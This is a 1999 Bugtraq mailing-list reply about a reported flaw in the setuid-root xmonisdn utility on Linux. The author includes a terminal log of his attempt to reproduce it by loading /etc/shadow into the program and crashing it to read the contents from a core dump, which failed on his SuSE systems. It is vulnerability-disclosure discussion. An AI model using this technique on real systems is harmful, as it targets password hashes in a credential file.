Bugtraq mailing list archives

Re: xmonisdn (isdn4k-utils/Linux) bug report

From: sysadmin () TATOOINE PING DE (Jan-Hendrik Terstegge)
Date: Wed, 20 Oct 1999 13:40:00 +0000

On Tue, 19 Oct 1999 Ron wrote:
While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.
I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)
[... exploit ...]
I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
seems as if it was an only RedHat Linux exploit.
This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
xmonisdn dies only with an Floating exception but it doesn't dump a core.

---snip---
[pts/[pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x    1 root    root    15340   Jul 23 01:20 xmonisdn
[pts/[pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow

[1]  +   Stopped                        xmonisdn -file /etc/shadow
[pts/[pts/0@tatooine] /usr/bin > bg
[1]     xmonisdn -file /etc/shadow &
[pts/[pts/0@tatooine] /usr/bin > killall -8 xmonisdn
[1]     Floating exception              xmonisdn -file /etc/shadow
[pts/[pts/0@tatooine] /usr/bin > strings core |less
strings: core: File or Directory not found
---snip---

--
Jan-Hendrik Terstegge
<sysadmin () tatooine ping de>